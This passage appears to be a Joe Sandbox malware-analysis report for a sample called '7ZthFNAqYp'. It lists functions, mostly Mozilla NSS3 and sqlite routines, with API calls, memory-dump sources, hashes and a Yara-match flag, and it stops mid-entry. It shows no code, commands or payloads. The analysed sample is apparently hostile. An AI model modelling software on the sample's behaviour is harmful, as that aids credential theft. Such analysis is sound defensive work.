                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1091488953-0
                                                                                                                                                                                                              • Opcode ID: 3cae1f3e3e99b2a45d93f9cb9668a325a1b19e4747efb84bf62cd5bb9ccd9cb4
                                                                                                                                                                                                              • Instruction ID: 5fcccb37ca301bef00ceb4bec09a952a7726081e245dc3f25d08f2393573843b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cae1f3e3e99b2a45d93f9cb9668a325a1b19e4747efb84bf62cd5bb9ccd9cb4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B31B5B2D002146BEB00AF65AD45BBB76B8AF98608F050125ED09A7701FB31D958D6E2
                                                                                                                                                                                                              Function 6CB1DC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6CB1D9E4,00000000), ref: 6CB1DC30
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6CB1D9E4,00000000), ref: 6CB1DC4E
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6CB1D9E4,00000000), ref: 6CB1DC5A
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CB1DC7E
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB1DCAD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Alloc_Util$Arenamemcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2632744278-0
                                                                                                                                                                                                              • Opcode ID: 849873a02fdc8fc71a0adb633d55505f673e9912b2d11479fae23c2a0472eba5
                                                                                                                                                                                                              • Instruction ID: 21fbcb3f14e01420d6acd412230075b11fc1761e866ad1fe1cba9c5dc46bb0cb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 849873a02fdc8fc71a0adb633d55505f673e9912b2d11479fae23c2a0472eba5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8316FB5A042809FD751CF29E884B56B7F8EF15358F148829E94CCBB01E775E944CBA1
                                                                                                                                                                                                              Function 6CB2CEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(?,6CB2CD93,?), ref: 6CB2CEEE
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: TlsGetValue.KERNEL32 ref: 6CB214E0
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: EnterCriticalSection.KERNEL32 ref: 6CB214F5
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: PR_Unlock.NSS3 ref: 6CB2150D
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CB2CD93,?), ref: 6CB2CEFC
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB210F3
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: EnterCriticalSection.KERNEL32(?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2110C
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21141
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PR_Unlock.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21182
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2119C
                                                                                                                                                                                                              • SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CB2CD93,?), ref: 6CB2CF0B
                                                                                                                                                                                                                • Part of subcall function 6CB20840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB208B4
                                                                                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CB2CD93,?), ref: 6CB2CF1D
                                                                                                                                                                                                                • Part of subcall function 6CB1FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CB18D2D,?,00000000,?), ref: 6CB1FB85
                                                                                                                                                                                                                • Part of subcall function 6CB1FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CB1FBB1
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CB2CD93,?), ref: 6CB2CF47
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CB2CD93,?), ref: 6CB2CF67
                                                                                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(?,00000000,6CB2CD93,?,?,?,?,?,?,?,?,?,?,?,6CB2CD93,?), ref: 6CB2CF78
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4291907967-0
                                                                                                                                                                                                              • Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                                                                                                              • Instruction ID: f106d687fcd0704ae8fa68ffc3ff410552c1d94153feda875601b1b0ca32433d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F1193A5A002845BFB10AEA66C41B7BB6ECDF54549F044139EC0DD7B41FB65DA08C6A2
                                                                                                                                                                                                              Function 6CAD8C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CAD8C1B
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32 ref: 6CAD8C34
                                                                                                                                                                                                              • PL_ArenaAllocate.NSS3 ref: 6CAD8C65
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CAD8C9C
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CAD8CB6
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: TlsGetValue.KERNEL32 ref: 6CB6DD8C
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB6DDB4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                                                                                                              • String ID: KRAM
                                                                                                                                                                                                              • API String ID: 4127063985-3815160215
                                                                                                                                                                                                              • Opcode ID: 020dcb17129c464cceef5b1024780d7babccb2d4e2dd5845273abc50aa89bf69
                                                                                                                                                                                                              • Instruction ID: 7bc0d6c6f019536abc30600c46495ec0d5d75b096a54b668162c709319d4fd3f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 020dcb17129c464cceef5b1024780d7babccb2d4e2dd5845273abc50aa89bf69
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07216DB1A05601CFD700AF79D484569BBF4FF05304F16896AD8888B711EB39E8C9CBD2
                                                                                                                                                                                                              Function 6CBD2C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_EnterMonitor.NSS3 ref: 6CBD2CA0
                                                                                                                                                                                                              • PR_ExitMonitor.NSS3 ref: 6CBD2CBE
                                                                                                                                                                                                              • calloc.MOZGLUE(00000001,00000014), ref: 6CBD2CD1
                                                                                                                                                                                                              • strdup.MOZGLUE(?), ref: 6CBD2CE1
                                                                                                                                                                                                              • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6CBD2D27
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Loaded library %s (static lib), xrefs: 6CBD2D22
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                                                                                                                              • String ID: Loaded library %s (static lib)
                                                                                                                                                                                                              • API String ID: 3511436785-2186981405
                                                                                                                                                                                                              • Opcode ID: aad8e891fe1ff3553e8ac6ca56991d261130cf42531a2733f783a82ac042149a
                                                                                                                                                                                                              • Instruction ID: 8d36bdd2aea4c040f6b0b10340e4ad819314ad866f13638835ab643f323b9de8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: aad8e891fe1ff3553e8ac6ca56991d261130cf42531a2733f783a82ac042149a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3811E6B57012D09FEB108F19D845A6A77B5EB45319F19813DE80987B41D736FC48CBA2
                                                                                                                                                                                                              Function 6CACBDC0 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6CACBDCA
                                                                                                                                                                                                                • Part of subcall function 6CB20FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CAC87ED,00000800,6CABEF74,00000000), ref: 6CB21000
                                                                                                                                                                                                                • Part of subcall function 6CB20FF0: PR_NewLock.NSS3(?,00000800,6CABEF74,00000000), ref: 6CB21016
                                                                                                                                                                                                                • Part of subcall function 6CB20FF0: PL_InitArenaPool.NSS3(00000000,security,6CAC87ED,00000008,?,00000800,6CABEF74,00000000), ref: 6CB2102B
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CACBDDB
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB210F3
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: EnterCriticalSection.KERNEL32(?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2110C
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21141
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PR_Unlock.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21182
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2119C
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CACBDEC
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2116E
                                                                                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6CACBE03
                                                                                                                                                                                                                • Part of subcall function 6CB1FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CB18D2D,?,00000000,?), ref: 6CB1FB85
                                                                                                                                                                                                                • Part of subcall function 6CB1FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CB1FBB1
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CACBE22
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CACBE30
                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CACBE3B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1821307800-0
                                                                                                                                                                                                              • Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                                                                                                                                                                              • Instruction ID: da591a97a491875dcdf2c0d84be2de0638a7eaa7e81dbe0d2cd6651fe842421c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF012B75B4024166F71022A6BC01FAF765C8F5078DF180231FE0C96BC2FB56D51882B7
                                                                                                                                                                                                              Function 0093FBB2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Name::operator+$NameName::
                                                                                                                                                                                                              • String ID: throw(
                                                                                                                                                                                                              • API String ID: 168861036-3159766648
                                                                                                                                                                                                              • Opcode ID: 2bf6caf8aa05833f26c054bc8bfc4c855887e1ab864b81c46916b1f724f2084e
                                                                                                                                                                                                              • Instruction ID: ebe6692590a1d9e8138d0d0b1413cd845633ed29aa843b915f3fcc229b2a05cc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2bf6caf8aa05833f26c054bc8bfc4c855887e1ab864b81c46916b1f724f2084e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94014031A4020DAFCF04EBA4D866EEE7BB9EF85748F404065F905AB291DA74DA458B84
                                                                                                                                                                                                              Function 6CB51C60 Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CB51C74
                                                                                                                                                                                                                • Part of subcall function 6CB6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB6C2BF
                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?), ref: 6CB51C92
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB51C99
                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?), ref: 6CB51CCB
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB51CD2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalDeleteSectionfree$ErrorValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3805613680-0
                                                                                                                                                                                                              • Opcode ID: ab612280c55077ad7086cd206a069c185be16eac812c973aaaf13c65e4610d99
                                                                                                                                                                                                              • Instruction ID: 95487262a0183ddc8691aa793b5fd5d2f4682e7186f387eb6ea76b802375c379
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab612280c55077ad7086cd206a069c185be16eac812c973aaaf13c65e4610d99
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 670196B1F212A09FDE31EFA5DC0D74937B8B706328F540125E909A6E40D72A91648792
                                                                                                                                                                                                              Function 6CBB1C40 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 45COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,6CAB3D77,?,?,6CAB4E1D), ref: 6CBB1C8A
                                                                                                                                                                                                              • sqlite3_free.NSS3(00000000), ref: 6CBB1CB6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_freesqlite3_mprintf
                                                                                                                                                                                                              • String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s
                                                                                                                                                                                                              • API String ID: 1840970956-3705377941
                                                                                                                                                                                                              • Opcode ID: d9e637dcbf9ac90a9570404c4126e2cfefc87f9a1bd8c99a7d6f4ae912367eac
                                                                                                                                                                                                              • Instruction ID: 11a862b445f6432a300a9f220fa2d04c43984d835c7847f00f538e004a01455d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9e637dcbf9ac90a9570404c4126e2cfefc87f9a1bd8c99a7d6f4ae912367eac
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B70124B5A001804BDB04AA68D81297177E5EF8234CB14486DE9489BB02EB32E89BC751
                                                                                                                                                                                                              Function 6CB2ED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6CB2ED6B
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000000), ref: 6CB2EDCE
                                                                                                                                                                                                                • Part of subcall function 6CB20BE0: malloc.MOZGLUE(6CB18D2D,?,00000000,?), ref: 6CB20BF8
                                                                                                                                                                                                                • Part of subcall function 6CB20BE0: TlsGetValue.KERNEL32(6CB18D2D,?,00000000,?), ref: 6CB20C15
                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,?,6CB2B04F), ref: 6CB2EE46
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CB2EECA
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CB2EEEA
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CB2EEFB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3768380896-0
                                                                                                                                                                                                              • Opcode ID: 6550e8274baa4e92a385031effcd9837f3f6cf934e213440a7d12ba35be10bfc
                                                                                                                                                                                                              • Instruction ID: 94c37d2755e3caa34f3f592fb5ff07e3c98364311642c70fa9c74f9f4626fdf3
